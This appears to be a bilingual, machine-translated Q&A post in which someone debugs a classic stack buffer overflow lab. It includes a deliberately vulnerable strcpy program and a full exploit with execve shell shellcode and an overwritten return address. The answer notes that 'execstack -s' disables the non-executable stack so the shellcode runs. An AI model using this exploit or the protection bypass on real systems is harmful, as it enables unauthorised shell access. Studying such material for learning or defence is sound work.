缓冲区溢出将无法工作得到段错误
[英]Buffer Overflow won't work get Seg Fault
问题描述
I try to get a Buffer Overflow to work.
我试图让缓冲区溢出工作。 I have the following simple vulnerable Program:我有以下简单易受攻击的程序:
int main(int argc, char** argv) {
char buffer[80];
strcpy(buffer,argv[1]);
return 1;
}
With the following Program i want to get a Shell with an Buffer Overflow.使用以下程序,我想获得一个带有缓冲区溢出的 Shell。
char shellcode[]=
"\x31\xc0"
"\x50"
"\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69"
"\x89\xe3"
"\x99"
"\x52"
"\x53"
"\x89\xe1"
"\xb0\x0b"
"\xcd\x80";
char retaddr[] = "\xa8\xd5\xff\xff";
#define NOP 0x90
int main() {
char buffer[96];
memset(buffer, NOP, 96);
memcpy(buffer, "EGG=",4);
memcpy(buffer+4,shellcode,24);
memcpy(buffer+88,retaddr,4);
memcpy(buffer+92, "\x00\x00\x00\x00",4);
putenv(buffer);
printf("%p\n", buffer);
system("/bin/sh");
return 0;
}
This Program creates an Buffer with the shellcode at Beginning.这个程序在开始时用 shellcode 创建了一个缓冲区。 After the Shellcode are some NOP Instruction and then the value that overrides the Return Address and points to the beginning of the Shellcode.在 Shellcode 之后是一些 NOP 指令,然后是覆盖返回地址并指向 Shellcode 开头的值。 Then it creates an Environment Variable with the buffer and starts a Shell.然后它使用缓冲区创建一个环境变量并启动一个 Shell。
If i run that program the shell started and the environment Variable is set.如果我运行该程序,shell 将启动并设置环境变量。 But if i try to run the vulnerable Program with the environment Variable as Parameter i get an segmentation fault.但是,如果我尝试使用环境变量作为参数运行易受攻击的程序,则会出现分段错误。
Here are some Screens with gdb: I don't have enough reputation to post images directly so here is the link to an imgur album with the 4 pictures in it.这里有一些带有 gdb 的屏幕:我没有足够的声誉直接发布图像,所以这里是一个包含 4 张图片的 imgur 相册的链接。
The first picture shows the Stack before the strcpy happens.第一张图显示了 strcpy 发生之前的堆栈。
The second one shows argv 1第二个显示 argv 1
The third picture shows the stack after the strcpy.第三张图是strcpy之后的栈。
If you can see 0xf7e00497 is the return address.如果你能看到 0xf7e00497 是返回地址。 If i disassamble this address the code for the libc function is shown.如果我解散这个地址,就会显示 libc 函数的代码。
In the third picture you see that this address is overridden by the address 0xffffd5a8 witch points to the top of the stack.在第三张图片中,您会看到该地址被指向堆栈顶部的地址 0xffffd5a8 覆盖。
In Picture Number 4 you see the segmentation fault if the programm countinous to run.在图 4 中,如果程序可运行,您会看到分段错误。
Can anybody tell my why?谁能告诉我为什么? Everything seems to be okay?好像一切正常? I compiled both programmes with the -fno-stack-protector option of gcc.我用 gcc 的 -fno-stack-protector 选项编译了这两个程序。
1 个解决方案
解决方案1
0 2015-09-27 11:45:41
Thanks @type1232, the issue was that the stack is not executable.谢谢@type1232,问题是堆栈不可执行。
With execstack -s vulProg , the shellcode will run.使用execstack -s vulProg ,shellcode 将运行。
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.